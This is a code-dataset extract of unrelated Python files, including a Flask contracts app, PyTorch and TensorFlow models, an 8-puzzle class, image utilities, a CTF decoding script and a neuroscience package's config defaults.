methods=['POST'])\n def updateContract():\n try:\n if session.get('user'):\n _status = 
request.form['status']\n _release_id = request.form['id']\n\n # print(_release_id+\" --------\")\n\n\n #####TO DO\n ###THIS SHOULD UPDATE ALL TAGS IN ALL STAGES\n\n query = db.releases.update_one({\"ocid\": _release_id},\n {\n \"$set\":\n {\n \"contracts.status\": _status\n\n }\n\n })\n\n if query.modified_count is 1:\n\n return json.dumps({'status': 'OK'})\n else:\n return json.dumps({'status': 'ERROR'})\n except Exception as e:\n return json.dumps({'status': 'Unauthorized access'})\n finally:\n db.close\n\n ################################### END OF CONTRACT MODAL\n\n\n\n # begin contract implementation\n @app.route('/newImplementation', methods=['POST'])\n def newImplementation():\n try:\n if session.get('user'):\n _release_id = request.form['id']\n variationYesOrNo = request.form.get('variationYesOrNo', '')\n bppapprovalNumber = request.form.get('bppapprovalNumber', '')\n variationamountt = int(request.form.get('variationamountt', ''))\n totalValue = int(request.form.get('totalValue', ''))\n print(variationYesOrNo)\n\n query = db.releases.update_one({\"ocid\": _release_id},\n {\n \"$set\":\n {\n \"contracts.implementation.variation\": variationYesOrNo,\n \"contracts.implementation.variationamount\": variationamountt,\n \"contracts.implementation.revisedcontractamount\": totalValue,\n \"contracts.implementation.bppapproval\": bppapprovalNumber\n }\n\n })\n\n if query.modified_count is 1:\n\n return json.dumps({'status': 'OK'})\n else:\n return json.dumps({'status': 'ERROR'})\n except Exception as e:\n return json.dumps({'status': 'Unauthorized access'})\n finally:\n db.close\n\n # update contract completion\n @app.route('/updateImplementation', methods=['POST'])\n def updateImplementation():\n try:\n if session.get('user'):\n _release_id = request.form['id']\n finalcost = int(request.form.get('finalcost', ''))\n status = request.form.get('status', '')\n completiontilldate = request.form.get('projcompletion', '')\n amount = int(request.form.get('amount', ''))\n\n query = db.releases.update_one({\"ocid\": _release_id},\n {\n \"$set\":\n {\n \"contracts.implementation.finalcost\": finalcost,\n \"contracts.implementation.projectstatus\": status,\n \"contracts.implementation.tilldate\": completiontilldate\n }\n\n })\n\n query = db.releases.update_one({\"ocid\": _release_id},\n {\n \"$push\":\n {\n \"contracts.implementation.amountspaid\": amount\n\n }\n\n })\n\n if query.modified_count is 1:\n\n return json.dumps({'status': 'OK'})\n else:\n return json.dumps({'status': 'ERROR'})\n except Exception as e:\n return json.dumps({'status': 'Unauthorized access'})\n finally:\n db.close\n\n ##################################CONTRACTS PAGE SEARCH\n\n # https://code.tutsplus.com/tutorials/full-text-search-in-mongodb--cms-24835\n # create search index on collection during config as specified above\n # db.releases.createIndex({\"$**\":\"text\"})\n # db.releases.getIndexes()\n # db.releases.dropIndex(\"$**_text\")\n\n\n # testing date\n # createIndex({\"releases.contracts.period.startDate\":1, \"releases.contracts.period.endDate\":1,\"$**\":\"text\"})\n\n\n\n # retrieve contracts method\n @app.route('/contractSearch', methods=['POST'])\n def contractSearch():\n try:\n _offset = int(request.form['offset'])\n searchString = request.form['searchString']\n\n # startDate = request.form['startDate']\n # endDate = request.form['endDate']\n\n # print(startDate)\n # print(endDate)\n print(searchString)\n\n _limit = pageLimit\n\n releases = db.releases.find({\"$text\": {\"$search\": searchString}})\n\n res = 
db.releases.find({\"$text\": {\"$search\": searchString}}).count()\n\n print(res)\n # releases = db.releases.find({\"releases.buyer.identifier.legalName\":_agencyName}).sort([('_id', -1)]).skip(_offset).limit(_limit)\n\n # res = db.releases.find({\"releases.buyer.identifier.legalName\":_agencyName}).count()\n # print(res)\n\n\n\n if res > 0:\n\n response = []\n releases_dict = []\n\n # parse the data (python list) and convert it into a dictionary so that it's easy to return as JSON\n for release in releases:\n sd = release['contracts']['signeddate']\n dString = sd.strftime(\"%Y-%m-%d\")\n\n startd = release['contracts']['period']['startDate']\n startString = startd.strftime(\"%Y-%m-%d\")\n\n endd = release['contracts']['period']['endDate']\n endString = endd.strftime(\"%Y-%m-%d\")\n\n # THE ARRAY IS A LIST\n coord = release['contracts']['projectlocation']['coord']\n\n # for rev in inrel['contracts']['projectlocation']['coord']:\n # print rev\n release_dict = {\n 'OCID': release['ocid'],\n 'contract_Description': release['contracts']['description'],\n 'reference': release['contracts']['reference'],\n 'contract_status': release['contracts']['status'],\n 'contract_date': dString,\n 'start_date': startString,\n 'end_date': endString,\n 'street': release['contracts']['projectlocation']['streetaddress'],\n 'city': release['contracts']['projectlocation']['city'],\n 'state': release['contracts']['projectlocation']['state'],\n 'country': release['contracts']['projectlocation']['country'],\n 'longit': coord[0],\n 'latitude': coord[1]\n }\n\n releases_dict.append(release_dict)\n response.append(releases_dict)\n response.append({'total': res})\n\n print(json.dumps(response))\n # convert into json after converting to dictionary\n return json.dumps(response)\n\n\n else:\n print('no result')\n return render_template('dashboard/mycontracts.html', error='No results found')\n\n except Exception as e:\n return render_template('dashboard/error.html', error=str(e))\n\n\n\n ###################################END CONTRACTS PAGE SEARCH\n\n\n##############################################################################################Dashboard#####################################################################################################\n\n\n##############################################################################################Releases#####################################################################################################\n\n\n\n\n\n\n\n################################################################################################\n\n\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0')\n","sub_path":"flaskapp.py","file_name":"flaskapp.py","file_ext":"py","file_size_in_byte":140317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"224577187","text":"\"\"\"socket client\"\"\"\n\nimport socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n# WEB:80,FTP:21,SMTP:25,小于1024的是Internet标准服务的端口\n# tuple\ns.connect(('127.0.0.1', 9999))\nprint(s.recv(1024).decode('utf-8'))\nfor data in [b'he', b'yi', b'feng']:\n s.send(data)\n print(s.recv(2014).decode('utf-8'))\ns.send(b'exit')\ns.close()\n","sub_path":"socketclient.py","file_name":"socketclient.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"542484551","text":"'''Simplified version of DLA in PyTorch.\n\nNote this implementation is not identical to the original paper 
version.\nBut it seems to work fine.\n\nSee dla.py for the original paper version.\n\nReference:\n Deep Layer Aggregation. https://arxiv.org/abs/1707.06484\n'''\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, in_planes, planes, stride=1):\n super(BasicBlock, self).__init__()\n self.conv1 = nn.Conv2d(\n in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3,\n stride=1, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion*planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion*planes,\n kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion*planes)\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.bn2(self.conv2(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\n\nclass Root(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size=1):\n super(Root, self).__init__()\n self.conv = nn.Conv2d(\n in_channels, out_channels, kernel_size,\n stride=1, padding=(kernel_size - 1) // 2, bias=False)\n self.bn = nn.BatchNorm2d(out_channels)\n\n def forward(self, xs):\n x = torch.cat(xs, 1)\n out = F.relu(self.bn(self.conv(x)))\n return out\n\n\nclass Tree(nn.Module):\n def __init__(self, block, in_channels, out_channels, level=1, stride=1):\n super(Tree, self).__init__()\n self.root = Root(2*out_channels, out_channels)\n if level == 1:\n self.left_tree = block(in_channels, out_channels, stride=stride)\n self.right_tree = block(out_channels, out_channels, stride=1)\n else:\n self.left_tree = Tree(block, in_channels,\n out_channels, level=level-1, stride=stride)\n self.right_tree = Tree(block, out_channels,\n out_channels, level=level-1, stride=1)\n\n def forward(self, x):\n out1 = self.left_tree(x)\n out2 = self.right_tree(out1)\n out = self.root([out1, out2])\n return out\n\n\nclass DLA(nn.Module):\n def __init__(self, block=BasicBlock):\n super(DLA, self).__init__()\n self.base = nn.Conv2d(3, 16, kernel_size=1, stride=1, bias=True)\n\n self.layer1 = nn.Conv2d(16, 16, kernel_size=3, stride=1, padding=1, bias=True)\n\n self.layer2 = nn.Conv2d(16, 32, kernel_size=3, stride=1, padding=1, bias=True)\n\n self.layer3 = Tree(block, 32, 256, level=1, stride=3)\n self.linear7 = nn.Linear(1024, 512)\n self.linear8 = nn.Linear(512, 256)\n self.linear9 = nn.Linear(256, 64)\n self.linear10 = nn.Linear(64, 10)\n self.dropout_input = 0.0\n self.dropout_hidden = 0.0\n self.is_training = True\n\n def forward(self, x):\n out = self.base(x)\n out = F.dropout(out, p=self.dropout_input, training=self.is_training)\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = F.avg_pool2d(out, 4)\n out = out.view(out.size(0), -1)\n # print(f'!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
out shape should be {out.shape}')\n out = self.linear7(out)\n out = self.linear8(out)\n out = self.linear9(out)\n out = self.linear10(out)\n return out\n\n\nclass PartConv(nn.Module):\n def __init__(self, block=BasicBlock, num_classes=10):\n super(PartConv, self).__init__()\n #self.base = nn.Conv2d(3, 16, kernel_size=1, stride=1, bias=True)\n\n self.layer1 = nn.Conv2d(16, 16, kernel_size=3, stride=1, padding=1, bias=True)\n\n self.layer2 = nn.Conv2d(16, 32, kernel_size=3, stride=1, padding=1, bias=True)\n\n self.layer3 = Tree(block, 32, 256, level=1, stride=3)\n self.linear7 = nn.Linear(1024, 512)\n self.linear8 = nn.Linear(512, 256)\n self.linear9 = nn.Linear(256, 64)\n #self.linear10 = nn.Linear(64, 10)\n self.dropout_input = 0.0\n self.dropout_hidden = 0.0\n self.is_training = True\n\n def forward(self, x):\n #out = self.base(x)\n out = F.dropout(x, p=self.dropout_input, training=self.is_training)\n # feed the dropout output into the first conv layer\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = F.avg_pool2d(out, 4)\n out = out.view(out.size(0), -1)\n # print(f'!!!!!!!!!!!!!!!!!!!!!!!!!!!! out shape should be {out.shape}')\n out = self.linear7(out)\n out = self.linear8(out)\n out = self.linear9(out)\n #out = self.linear10(out)\n return out\n","sub_path":"dla_simple.py","file_name":"dla_simple.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"53313361","text":"class Board:\n\n def __init__(self, input_tiles):\n self.tiles = input_tiles\n self.history = []\n\n @classmethod\n def sample(cls):\n return Board([1, 2, 3, 4, 0, 5, 6, 7, 8])\n\n def move_up(self):\n gap = self.gap()\n can_go = self.can_go()\n if can_go[0]:\n self.tiles[gap] = self.tiles[gap - 3]\n self.tiles[gap - 3] = 0\n self.add_history()\n else:\n raise BoardException('invalid move')\n\n def move_down(self):\n gap = self.gap()\n can_go = self.can_go()\n if can_go[2]:\n self.tiles[gap] = self.tiles[gap + 3]\n self.tiles[gap + 3] = 0\n self.add_history()\n else:\n raise BoardException('invalid move')\n\n def move_left(self):\n gap = self.gap()\n can_go = self.can_go()\n if can_go[3]:\n self.tiles[gap] = self.tiles[gap - 1]\n self.tiles[gap - 1] = 0\n self.add_history()\n else:\n raise BoardException('invalid move')\n\n def move_right(self):\n gap = self.gap()\n can_go = self.can_go()\n if can_go[1]:\n self.tiles[gap] = self.tiles[gap + 1]\n self.tiles[gap + 1] = 0\n self.add_history()\n else:\n raise BoardException('invalid move')\n\n def gap(self):\n return self.tiles.index(0)\n\n def can_go(self):\n if (self.gap() - 3) <= -1:\n go_up = False\n else:\n go_up = True\n\n if (self.gap() + 3) >= 9:\n go_down = False\n else:\n go_down = True\n\n if ((self.gap() + 1) % 3) == 0:\n go_right = False\n else:\n go_right = True\n\n if ((self.gap() + 3) % 3) == 0:\n go_left = False\n else:\n go_left = True\n\n return [go_up, go_right, go_down, go_left]\n\n def print_board(self):\n for tile in self.tiles:\n if self.tiles.index(tile) not in [2, 5, 8]:\n end = ' '\n else:\n end = \"\\n\"\n\n if tile == 0:\n print(' ', end=end)\n else:\n print(tile, end=end)\n\n def add_history(self):\n self.history.append(self)\n\nclass BoardException(Exception):\n def __init__(self, args):\n Exception.__init__(self, str(args))\n self.args = args\n\n","sub_path":"src/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"208458510","text":"#!/usr/bin/env 
python\n\n\"\"\"Pycon Funnel App\"\"\"\n\nfrom setuptools import find_packages, setup\n\ndependencies = ['setuptools', 'flask', 'subprocess', 'jinja2', 'urllib2', 'BeautifulSoup4',]\n\nsetup(name = 'Pycon_Funnel_App',\n version = '0.1',\n description = \"An app to see Pycon India 2013 Statistics.\",\n platforms = [\"Linux\"],\n author = \"Shantanu Sarkar, Shalini Roy, Sheesh Mohsin\",\n author_email = \"shantanusarkar.me@gmail.com\",\n url = \"http://dgplug.org/summertraining/2013/\",\n license = \"MIT\",\n install_requires=[\n \"setuptools\",\n \"flask\",\n \"subprocess\",\n \"jinja2\",\n \"urllib2\",\n \"BeautifulSoup4\",\n \"pyparsing\",\n ],\n include_package_data=True,\n scripts = ['project1'],\n dependency_links=[\n \"https://pypi.python.org/packages/source/F/Flask-Admin/Flask-Admin-1.0.7.tar.gz\",\n \"https://pypi.python.org/packages/source/s/subprocess.run/subprocess.run-0.0.8.tar.gz\",\n \"https://pypi.python.org/packages/source/J/Jinja2/Jinja2-2.7.1.tar.gz\",\n \"https://pypi.python.org/packages/source/h/httpsproxy_urllib2/httpsproxy_urllib2-1.0.tar.gz\",\n \"https://pypi.python.org/packages/source/b/beautifulsoup4/beautifulsoup4-4.3.2.tar.gz\",\n \"https://pypi.python.org/pypi/pyparsing/2.0.1#downloads\",\n ],\n packages = find_packages()\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"280475960","text":"from PIL import Image, ImageDraw, ImageFont\nimport sys\n\nfoo = \"0123456789ABCDEF\"\n\nimg = Image.open(sys.argv[1])\n\ndraw = ImageDraw.Draw(img)\n\nw,h = img.size\ngw = w / 16\ngh = h / 16\n\nfs = gw / 2\nfontsize = 8\nfont = ImageFont.truetype(\"LiberationSans-Bold.ttf\", fontsize)\nwhile font.getsize(\"AA\")[0] < fs:\n fontsize += 1\n font = ImageFont.truetype(\"LiberationSans-Bold.ttf\", fontsize)\n\n\n\nfor i,c in enumerate(foo):\n for j,k in enumerate(foo):\n fw,fh = font.getsize(c+k)\n y = int(i * gh + (gh - fh) / 2)\n x = int(j * gw + (gw - fw) / 2)\n draw.text((x,y),c+k, font=font)\n\nfor i in xrange(len(foo)-1):\n draw.line(((i+1)*gw,0,(i+1)*gw,h))\n draw.line((0,(i+1)*gh,w,(i+1)*gh))\nimg.save(sys.stdout, \"PNG\")\n","sub_path":"arch/addGrid.py","file_name":"addGrid.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"460064093","text":"# Rotating Image Effect\n# Rotating Webcam Input\n\n\nimport cv2\nimport time\n\ndef main():\n \n\twindowName = \"Live Video Feed\"\n\tcv2.namedWindow(windowName)\n\tcap = cv2.VideoCapture(0)\n\t\t\n\tif cap.isOpened():\n\t\tret, frame = cap.read()\n\telse:\n\t\tret = False\n\t\t\n\trows, columns, channels = frame.shape\n\tangle = 0\n\tscale = 1\n\t\t\n\twhile True:\n\t\tret, frame = cap.read()\n\t\t\t\t\n\t\tif angle == 360:\n\t\t\tangle = 0\n\t\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\tR = cv2.getRotationMatrix2D((columns/2, rows/2), angle, scale)\n\t\t\t\t\n\t\t\t\t\n\t\t\t\n\t\toutput = cv2.warpAffine(frame, R, (columns, rows))\n\t\t\t\n\t\t\t\n\t\tcv2.imshow(windowName, output)\n\t\tangle = angle + 1\n\t\ttime.sleep(0.5)\n\t\t\t\t\n\t\tif cv2.waitKey(1) == 27:\n\t\t\tbreak\n\t\t\t\n\tcv2.destroyWindow(windowName)\n\tcap.release()\n\nif __name__ == \"__main__\":\n main()","sub_path":"WebCam_input_rotation.py","file_name":"WebCam_input_rotation.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} 
+{"seq_id":"562616032","text":"\"\"\" Default configurations for nems_config. Should fall back on these when\na config file is not present (i.e. if Storage_Config.py doesn't exist, import\nnems_config.defaults.STORAGE_DEFAULTS instead).\n\nAlso stores defaults for interface options, such as which columns to show\non the results table or what minimum SNR to require for plots by default.\n\n\"\"\"\n\nimport sys\nimport logging\n# Used 'root' instead of __name__ because the pre-configuration logging\n# would not show up otherwise.\n# And then root stopped showing up too...\n# TODO: Figure out best way to get log statements in this module\n# to show up with the others.\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\nformatter = logging.Formatter(\"%(asctime)s : %(levelname)s : %(name)s, \"\n \"line %(lineno)s:\\n%(message)s\\n\")\nch = logging.StreamHandler(stream=sys.stdout)\nch.setFormatter(formatter)\nch.setLevel(logging.DEBUG)\nlog.addHandler(ch)\n\nfrom pathlib import Path\nimport importlib\nimport os\nimport warnings\nimport traceback\nimport errno\nimport logging.config\nimport datetime as dt\nimport boto3\nfrom botocore import UNSIGNED\nfrom botocore.config import Config\n\nimport demo as ns\nimport nems_logs\nSAMPLE_PATH = os.path.dirname(os.path.abspath(ns.__file__))\nNEMS_LOGS_PATH = os.path.dirname(os.path.abspath(nems_logs.__file__))\n# stays false unless changed by db.py if database info is missing\nDEMO_MODE = False\n\nclass UI_OPTIONS():\n cols = ['r_test', 'r_fit', 'n_parms']\n rowlimit = 500\n sort = 'cellid'\n # specifies which columns from narf results can be used to quantify\n # performance for plots\n measurelist = [\n 'r_test' , 'r_ceiling', 'r_fit', 'r_active', 'mse_test',\n 'mse_fit', 'mi_test', 'mi_fit', 'nlogl_test',\n 'nlogl_fit', 'cohere_test', 'cohere_fit',\n ]\n # any columns in this list will always show on results table\n required_cols = ['cellid', 'modelname']\n # specifies which columns to display in 'details' tab for analysis\n detailcols = ['id', 'status', 'question', 'answer']\n # default minimum values for filtering out cells before plotting\n iso = 0\n snr = 0\n snri = 0\n\nclass STORAGE_DEFAULTS():\n DIRECTORY_ROOT = SAMPLE_PATH\n USE_AWS = False\n\nclass FLASK_DEFAULTS():\n Debug = False\n COPY_PRINTS = False\n CSRF_ENABLED = True\n\nclass LOGGING_DEFAULTS():\n \"\"\" Specifies default configuration for nems logging. To change settings\n for a local configuration, place a file named \"Logging_Config.py\" in the\n nems_config directory with the same structure as this class. Alternatively,\n if a different log file is desired but all other settings can remain the\n same, the filepath and/or log name can be specified in the NEMSLOG and\n NEMSLOGPATH environment variables. 
Similarly, the logging levels for\n the console and file handlers can be overridden with variables\n NEMSLVLCON and NEMSLVLFILE, respectively.\n\n Order of precedence when settings conflict between environment variables,\n top-level config file variables, and dictionary values:\n 1st: Environment Variables\n 2nd: Top-level Variables\n 3rd: Dictionary Value\n\n Example Logging_Config contents:\n Copy & paste the whole class, then make tweaks as desired\n (log_root doesn't have to be included if the default is acceptable,\n but keeping the full logging_config dict as a scaffold is recommended):\n log_root = 'my/file/path'\n\n logging_config = {\n 'version': 1,\n 'formatters': {\n 'basic': {'format': '...'},\n 'my_formatter': {'format': '%(asctime)s -- %(message)s'},\n },\n 'handlers': {\n 'console':\n ... [abbreviated],\n 'formatter': 'my_formatter',\n },\n 'loggers': {\n ... [abbreviated]\n },\n 'root': {\n 'handlers': ['console'],\n },\n }\n\n Example environment variable specifications:\n #1) Specify exact file name:\n NEMSLOG='/my/file/path/log_name.log'\n export NEMSLOG\n nems-fit-single . . .\n\n #2) Specify directory root, but let nems decide the file name:\n NEMSLOGPATH='/my/file/path/'\n export NEMSLOGPATH\n nems-fit-single . . .\n\n #3) Specify different log levels for the console and file handlers:\n NEMSLVLFILE='INFO'\n NEMSLVLCON='WARNING'\n export NEMSLVLFILE NEMSLVLCON\n nems-fit-single . . .\n\n NOTES: -If NEMSLOG is specified, it will override NEMSLOGPATH.\n -The top-level log_root variable overrides any filename specified\n within the config dictionary, so it should be reassigned to a blank\n string (i.e. '') if a filename specified in the dictionary\n is desired.\n\n \"\"\"\n\n # directory to store log files in\n log_root = NEMS_LOGS_PATH\n # log levels for the respective handlers\n # note: these levels will override values in the dictionary if specified.\n console_level = 'INFO'\n file_level = 'DEBUG'\n\n logging_config = {\n 'version': 1,\n 'formatters': {\n 'basic': {'format': (\n \"%(asctime)s : %(levelname)s : %(name)s, \"\n \"line %(lineno)s:\\n%(message)s\\n\"\n )\n },\n 'short': {'format': \"%(name)s, %(lineno)s : %(message)s\\n\"},\n },\n 'handlers': {\n # only console logger included by default,\n # log file added at runtime if filename is present\n # (a default filename will be present unless overwritten)\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'short',\n 'level': 'INFO',\n },\n 'file': {\n 'class': 'logging.FileHandler',\n 'formatter': 'basic',\n 'encoding': 'UTF-8',\n 'filename': '',\n 'mode': 'a',\n # 0: none, 10: DEBUG, 20: INFO, 30: WARNING,\n # 40: ERROR, 50: CRITICAL\n 'level': 'DEBUG',\n }\n },\n 'loggers': {\n # This level should be left at DEBUG;\n # to adjust message display, change logging level for\n # console and/or file handlers as needed\n 'nems': {'level': 'DEBUG'},\n 'nems_config': {'level': 'DEBUG'},\n 'nems_scripts': {'level': 'DEBUG'},\n 'nems_web': {'level': 'DEBUG'},\n },\n 'root': {\n 'handlers': ['console'],\n },\n }\n\ndef update_settings(module_name, default_class):\n \"\"\" Overwrites contents of default_class with contents of the specified\n config module. Only attributes specified in the config module will be\n overwritten, others are left as defaults.\"\"\"\n\n try:\n log.debug(\"Attempting to update {0} with values from {1}\"\n .format(default_class, module_name))\n mod = importlib.import_module('.' 
+ module_name, 'nems_config')\n except Exception as e:\n log.debug(\"Error when attempting to import settings for {0}: {1}\"\n .format(e, module_name))\n log.debug(\"Couldn't import settings for: {0} -- using defaults... \"\n .format(module_name))\n return\n\n for key in mod.__dict__:\n setattr(default_class, key, getattr(mod, key))\n\n# update config classes with variables specified in user-provided\n# config modules.\nupdate_settings(\"Storage_Config\", STORAGE_DEFAULTS)\nupdate_settings(\"Flask_Config\", FLASK_DEFAULTS)\nupdate_settings(\"Logging_Config\", LOGGING_DEFAULTS)\n\ndef configure_logging():\n logging_config = LOGGING_DEFAULTS.logging_config\n console_level = LOGGING_DEFAULTS.console_level\n file_level = LOGGING_DEFAULTS.file_level\n log_root = LOGGING_DEFAULTS.log_root\n # filename should be an empty string unless added by user\n filename = logging_config['handlers']['file']['filename']\n\n # filename specified by environment variable will take precedence\n try:\n filename = os.environ['NEMSLOG']\n except:\n log.debug(\"No filename specified in OS environment, trying file \"\n \"specified in Logging_Config or LOGGING_DEFAULTS\")\n try:\n # root directory in environment variables takes precedence\n log_root = os.environ['NEMSLOGPATH']\n except:\n log.debug(\"No fileroot specified in OS environment, trying \"\n \"path specified in Logging_Config or LOGGING_DEFAULTS\")\n if log_root:\n # if log_root wasn't removed by user, set log file to\n # time-based filename inside that directory\n timestamp = dt.datetime.now().strftime('%Y-%m-%d')\n file = 'nemslog_{0}.log'.format(timestamp)\n filename = os.path.join(log_root, file)\n try:\n os.makedirs(log_root)\n except OSError as e:\n # check if error was because directory already exists\n if e.errno != errno.EEXIST:\n log.debug(\"Log file directory could not be created: {0} --\"\n \"\\nError: {1}\"\n .format(log_root, e))\n filename = None\n else:\n pass\n\n if filename:\n # if log_root wasn't specified, but a filename was, try\n # creating directory from filename instead.\n # find the last / in filename, and chop off the rest to get root\n root_idx = filename.rfind('/')\n file_root = filename[:root_idx+1]\n try:\n os.makedirs(file_root)\n except OSError as e:\n if e.errno != errno.EEXIST:\n log.debug(\"Log file directory could not be created: {0} --\"\n \"\\nError: {1}\"\n .format(file_root, e))\n filename = None\n else:\n pass\n\n # levels specified in environment variables will take precedence\n try:\n console_level = os.environ['NEMSLVLCON']\n except:\n pass\n try:\n file_level = os.environ['NEMSLVLFILE']\n except:\n pass\n\n log.debug(\"log filename ended up being: %s\"%filename)\n # if file handler wasn't removed by user and filename isn't blank,\n # configure the relevant keys and add the file handler to the root.\n if filename and 'file' in logging_config['handlers']:\n logging_config['handlers']['file']['filename'] = filename\n logging_config['handlers']['file']['level'] = file_level\n logging_config['root']['handlers'].append('file')\n logging_config['handlers']['console']['level'] = console_level\n log.debug(\"logging_config dict ended up being: %s\"%logging_config)\n logging.config.dictConfig(logging_config)\n\ntry:\n configure_logging()\n log.debug(\"logging successfully configured.\")\n # reconfigure logger for this module after settings applied\n log = logging.getLogger(__name__)\nexcept Exception as e:\n log.warning(\"Attempt to configure logging resulted in error: {0}\"\n .format(e))\n\n# send uncaught exceptions to log 
file if file handler is set up.\n# will also go to console as normal.\nexlogger_name = \"Uncaught_Exception\"\nexlog = logging.getLogger(exlogger_name)\ndef uncaught_exception_handler(type, value, tb):\n string = \"{0}, TRACEBACK:\".format(type)\n hashline = \"#\"*(len(string)+len(exlogger_name)+2)\n exlog.exception(\"{0}\\n{1}\\n\".format(string, hashline))\n tblist = traceback.format_list(traceback.extract_tb(tb))\n for i, tb in enumerate(tblist):\n exlog.exception(str(i) + \": \" + tb)\nsys.excepthook = uncaught_exception_handler\n\n# TODO: add logger for warnings formatting\n#import sys\n#import warnings\n#import traceback\n#def warn_with_traceback(message, category, filename, lineno, file=None,\n# line=None):\n# log = file if hasattr(file, 'write') else sys.stderr\n# traceback.print_stack(file=log)\n# log.write(warnings.formatwarning(message, category, filename,\n# lineno, line))\n#warnings.showwarning = warn_with_traceback\n\n\ndb_path = os.path.join(SAMPLE_PATH, 'demo_db.db')\nlog.debug(\"db_path for demo ended up being: {0}\".format(db_path))\ndb_obj = Path(db_path)\n# Check if sample database exists. If it doesn't, get it from the public s3\nif not db_obj.exists():\n log.info(\"Demo database not found, retrieving....\")\n s3_client = boto3.client(\n 's3',\n #aws_access_key_id='dummyid', aws_secret_access_key='dummykey',\n #aws_session_token='dummytoken',\n #config=Config(signature_version=UNSIGNED),\n )\n key = \"demodb/demo_db.db\"\n fileobj = s3_client.get_object(Bucket='nemspublic', Key=key)\n with open(db_path, 'wb+') as f:\n f.write(fileobj['Body'].read())\n log.info(\"Demo database written to: \")\n log.info(db_path)","sub_path":"nems_config/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":13495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"583787555","text":"# enc = ''.join([chr((ord(flag[i]) << 8) + ord(flag[i + 1])) for i in range(0, len(flag), 2)])\n\nwith open(\"enc\", \"r\") as f:\n enc = f.read()\n\nenc_length = len(enc)\n\nprint(f\"Encrypted: {enc}\")\nprint(f\"Enc length: {enc_length}\")\n\nflag = \"\"\nfor i in range(len(enc)):\n firstchar = chr(ord(enc[i]) >> 8)\n secondchar = chr((ord(enc[i]) - (ord(firstchar) << 8)))\n\n flag += firstchar\n flag += secondchar\n\nprint(f\"Flag: {flag}\")","sub_path":"Reverse Engineering/Transformation/decrypt.py","file_name":"decrypt.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"645761360","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nimport unittest\n\nfrom flask import json\nfrom six import BytesIO\n\nfrom openapi_server.models.sample_body import SampleBody # noqa: E501\nfrom openapi_server.models.sample_response import SampleResponse # noqa: E501\nfrom openapi_server.test import BaseTestCase\n\n\nclass TestDefaultController(BaseTestCase):\n \"\"\"DefaultController integration test stubs\"\"\"\n\n def test_sample_datasource(self):\n \"\"\"Test case for sample_datasource\n\n Performs a preliminary analysis of the data on a chunk of the file\n \"\"\"\n sample_body = {\n \"file\" : \"file\",\n \"delimiter\" : \"delimiter\"\n}\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = self.client.open(\n '/sample',\n method='POST',\n headers=headers,\n data=json.dumps(sample_body),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + 
response.data.decode('utf-8'))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"openapi_server/test/test_default_controller.py","file_name":"test_default_controller.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"542062797","text":"import tensorflow as tf\n\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nmnist = input_data.read_data_sets(\"../tmp/data/\", one_hot=True)\n\nlearning_rate = 0.01\nepochs = 100\nbatch_size = 10\ndisplay_step = 10\n\nno_of_inputs = 784 # no of input pixels\nno_of_outputs = 10 # no of outputs\ndrop_out = 0.75 # keep probability\n\ninput_data = tf.placeholder(tf.float32, [None, 784], name='Input')\noutput_data = tf.placeholder(tf.float32, [None, 10], name='Output')\nkeep_prob = tf.placeholder(tf.float32)\n\nweights = {\n 'weight1': tf.Variable(tf.random_normal([5, 5, 1, 32])), # for 1st Conv layer C5-32\n 'weight2': tf.Variable(tf.random_normal([5, 5, 32, 64])), # for 2nd Conv layer C5-64\n 'weight3': tf.Variable(tf.random_normal([7 * 7 * 64, 1024])), # for fully connected layer\n 'weight4': tf.Variable(tf.random_normal([1024, no_of_outputs])) # for output layer\n}\n\nbias = {\n 'bias1': 